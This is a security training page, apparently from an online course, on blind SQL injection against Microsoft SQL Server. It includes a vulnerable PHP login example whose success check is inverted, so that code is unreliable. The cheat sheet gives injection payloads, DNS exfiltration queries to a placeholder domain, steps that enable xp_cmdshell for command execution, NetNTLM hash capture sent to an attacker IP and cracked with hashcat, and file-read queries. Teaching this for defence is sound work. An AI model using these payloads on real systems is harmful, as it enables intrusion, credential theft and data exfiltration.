Blind SQL Injection

Introduction to Blind SQL Injection

Introduction

Non-Blind SQL injection is the typical "easy-to-exploit" SQL injection that you are likely familiar with. An example could be a vulnerable search feature that returns matching posts that you could exploit by injecting UNION SELECT table_name,table_schema FROM information_schema.tables;-- to list all the tables in the database.

Blind SQL injection is a type of SQL injection where the attacker isn't returned the results of the relevant SQL query, and they must rely on differences in the page to infer the query results. An example of this could be a login form that does use our input in a database query but does not return the output to us.

The two categories of Blind SQL Injection are:

Boolean-based a.k.a. Content-based, which is when the attacker looks for differences in the response (e.g. Response Length) to tell if the injected query returned True or False.
Time-based, which is when the attacker injects sleep commands into the query with different durations, and then checks the response time to indicate if a query is evaluated as True or False.

Blind SQLi can occur when developers don't properly sanitize user input before including it in a query, just like any other SQL injection. One thing worth noting is that all time-based techniques can be used in boolean-based SQL injections, however, the opposite is not possible.

Example of Boolean-based SQLi

Here's an example of some PHP code that is vulnerable to a boolean-based SQL injection via the email POST parameter. Although the results of the SQL query are not returned, the server responds with either Email found or Email not found depending on if the query returned any rows or not. An attacker could abuse this to run arbitrary queries and check the response content to figure out if the query returned rows (true) or not (false).

<?php
...
$connectionInfo = Array("UID" => "db_user", "PWD" => "db_P@55w0rd#", "Database" => "prod");
$conn = sqlsrv_connect("SQL05", $connectionInfo);
$sql = "SELECT * FROM accounts WHERE email = '" . $_POST['email'] . "'";
$stmt = sqlsrv_query($conn, $sql);
$row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC);
if ($row === null) {
    echo "Email found";
} else {
    echo "Email not found";
}
...
?>

Conclusion

Up to this point, we've introduced MSSQL and the two types of Blind SQL injection. The best way to learn is to practice, so in the next two chapters we will cover custom examples of boolean-based and time-based SQL injections, and how to exploit them by writing custom scripts.

Previous Next

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Defending against SQL Injection

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Boolean-based

' AND 1=1;--

Time-based

'; IF (1=1) WAITFOR DELAY '0:0:10';--

DNS OOB

SQL Function	SQL Query
`master..xp_dirtree`	`DECLARE @T varchar(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_dirtree "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_fileexist`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_fileexist "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_subdirs`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_subdirs "\\'+@T+'.YOUR.DOMAIN\\x"');`
`sys.dm_os_file_exists`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM sys.dm_os_file_exists('\\'+@T+'.YOUR.DOMAIN\x');`
`fn_trace_gettable`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_trace_gettable('\\'+@T+'.YOUR.DOMAIN\x.trc',DEFAULT);`
`fn_get_audit_file`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_get_audit_file('\\'+@T+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`
`split result into sub-domains`	`DECLARE @T VARCHAR(MAX); DECLARE @A VARCHAR(63); DECLARE @B VARCHAR(63); SELECT @T=CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), flag), 1) from flag; SELECT @A=SUBSTRING(@T,3,63); SELECT @B=SUBSTRING(@T,3+63,63); SELECT * FROM fn_get_audit_file('\\'+@A+'.'+@B+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`

[MSSQL] RCE

-- Check if we are sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Enable 'Advanced Options'
EXEC sp_configure 'Show Advanced Options', '1';
RECONFIGURE;

-- Enable 'xp_cmdshell'
EXEC sp_configure 'xp_cmdshell', '1';
RECONFIGURE;

-- Ping ourselves
EXEC xp_cmdshell 'ping /n 4 192.168.43.164';

[MSSQL] NetNTLM

[!bash!]$ sudo python3 Responder.py -I eth0

EXEC master..xp_dirtree '\\<ATTACKER_IP>\myshare', 1, 1;

[!bash!]$ hashcat -m 5600 'jason::SQL01:bd7f162c24a39a0f:94DF80C5ABB...SNIP...000000' /usr/share/wordlists/rockyou.txt

[MSSQL] File Read

-- Check if we have the permissions needed to read files
SELECT COUNT(*) FROM fn_my_permissions(NULL, 'DATABASE') WHERE permission_name = 'ADMINISTER BULK OPERATIONS' OR permission_name = 'ADMINISTER DATABASE BULK OPERATIONS';

-- Get the length of a file
SELECT LEN(BulkColumn) FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

-- Get the contents of a file
SELECT BulkColumn FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

Blind SQL Injection

Introduction to Blind SQL Injection

Introduction

Example of Boolean-based SQLi

Conclusion

Table of Contents

Introduction

Boolean-based SQLi

Time-based SQLi

MSSQL-specific Attacks

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Skills Assessment

My Workstation